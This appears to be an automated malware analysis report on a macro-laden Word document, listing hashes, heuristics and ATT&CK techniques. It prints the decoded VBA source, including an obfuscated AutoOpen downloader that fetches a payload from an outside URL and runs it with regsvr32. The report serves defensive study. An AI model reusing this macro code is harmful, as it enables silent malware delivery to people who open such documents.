Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d5f3e5ea9c3b7afb…

MALICIOUS

Office (OOXML)

134.7 KB Created: 2020-07-09 00:04:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-15
MD5: 9cb97948976169d1e16815a61ba64c8d SHA-1: 2e5689803f3682cadf1a8a607d3644d16209689b SHA-256: d5f3e5ea9c3b7afb3c4dd818b1807986e73236d6b3b50214d7ad908ac094e81c
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with an AutoOpen macro. This macro is configured to execute a shell command, indicating an attempt to download and run a secondary payload. The presence of an external relationship pointing to a local file path is suspicious and may be part of the payload delivery mechanism.

Heuristics 5

  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\it.jpg
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4913 bytes
SHA-256: 7aede3cc6066d260e150b5b68eac15e30ab95ef54a538aa89e72a77c798f5098
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fd04a0c9"
Function e70d573d()
e70d573d = 115
End Function
Function a7ebcbfa()
a7ebcbfa = Application.ActiveDocument.AttachedTemplate
End Function
Function b4dbedd1()
b4dbedd1 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function cbe53580()
cbe53580 = Application.ActiveDocument.Creator
End Function
Sub dcf6688e(f350434d, e2773b0e)
Dim cb792a08
cb792a08 = FreeFile
Open f350434d For Output As #cb792a08
Print #cb792a08, aa8c3adf(e2773b0e)
Close #cb792a08
End Sub
Function ddaf8864()
ddaf8864 = ActiveWindow.EnvelopeVisible
End Function
Function d8da2402() As Long
Dim a00d09d5 As Integer
Dim b7b5c4bb As Long
b7b5c4bb = 217
For a00d09d5 = 32 To 75
b7b5c4bb = b7b5c4bb - a00d09d5
Next a00d09d5
d8da2402 = b7b5c4bb
End Function
Function cae3a3e1()
cae3a3e1 = 7274.1088222074
End Function
Function fb539e93()
fb539e93 = ActiveWindow.DocumentMap
End Function
Function e6f9dcf0(c09dd58e)
a5961324 = Len(c09dd58e)
For cb0c6ec1 = 1 To a5961324 Step 2
c889e0ed = c889e0ed & Mid(c09dd58e, cb0c6ec1, 1)
Next
e6f9dcf0 = c889e0ed
End Function
Function d0ad469f()
d0ad469f = Application.ActiveDocument.AutoSaveOn
End Function
Function f82242ef()
f82242ef = ActiveWindow.WindowState
End Function
Function bd98885b()
bd98885b = ActiveWindow.Split
End Function
Function f9c93bf5()
f9c93bf5 = Application.ActiveDocument.AutoHyphenation
End Function
Sub a4e59db5()
End Sub
Function c9e0bbc4()
c9e0bbc4 = ActiveWindow.HorizontalPercentScrolled
End Function
Function d5258384()
d5258384 = ActiveWindow.Index
End Function
Function ada00e74()
ada00e74 = True
End Function
Function ddc1ff1c()
ddc1ff1c = ActiveWindow.View
End Function
Sub AutoOpen()
Dim ecd32534 As New a015b50a
dcf6688e e6f9dcf0("c5:a\dp1r6o5g9r8admbd2aet7a0\85a3b0f1b0e.aj2p5gd"), ecd32534.e07df3f5(e6f9dcf0("h1tdt6pf:d/e/ehbq13dl8l0.8c6o8m6/8ifz158/4ycadc3a3.6pfhdp9?ele=fk3p2t41a12.dcbabbd"))
Dim b42370f8 As New WshShell
b42370f8.exec ea288f1c & " " & e6f9dcf0("c5:a\dp1r6o5g9r8admbd2aet7a0\85a3b0f1b0e.aj2p5gd")
End Sub

Attribute VB_Name = "ffa9cef4"
Function bd788388()
bd788388 = ActiveWindow.Selection
End Function
Function ca4877b8()
ca4877b8 = ActiveWindow.HorizontalPercentScrolled
End Function
Function c7929515(f86a7ea9 As Long) As Long
Dim a4415cfb As Long
For a4415cfb = 39 To 93
f86a7ea9 = f86a7ea9 - a4415cfb
Next a4415cfb
c7929515 = f86a7ea9
End Function
Function e19b7643()
e19b7643 = 964909800 / 21022
End Function
Function aa8c3adf(b3422104)
aa8c3adf = StrConv(b3422104, 64)
End Function
Function ef36f7ad()
ef36f7ad = ActiveWindow.VerticalPercentScrolled
End Function
Function d4c07551()
d4c07551 = ActiveWindow.Hwnd
End Function
Function ce319fe6(ae37276d As Long) As Long
Dim b9c8044f As Integer
For b9c8044f = 49 To 87
ae37276d = ae37276d + b9c8044f
Next b9c8044f
ce319fe6 = ae37276d
End Function
Function f8b4e6f9()
f8b4e6f9 = Application.ActiveDocument.ActiveTheme
End Function
Function e0738706()
End Function
Function ff43abc0()
ff43abc0 = ActiveWindow.Creator
End Function
Function d0b8d817(f5932e35np As String) As Boolean
If Len(f5932e35np) > 664 Then
d0b8d817 = False
End If
End Function
Function a7f4e88a()
a7f4e88a = Application.ActiveDocument.CompatibilityMode
End Function
Function c851d88b()
c851d88b = ActiveWindow.IMEMode
End Function
Function ea288f1c()
ea288f1c = e6f9dcf0("rce2gcs8v6r83626")
End Function

Attribute VB_Name = "a015b50a"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function f6109c52()
f6109c52 = ActiveW
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 29696 bytes
SHA-256: 4cd5a4b15b77be71ea7843367733c2e24af4f4b1e4589b03088733a4a7e8015b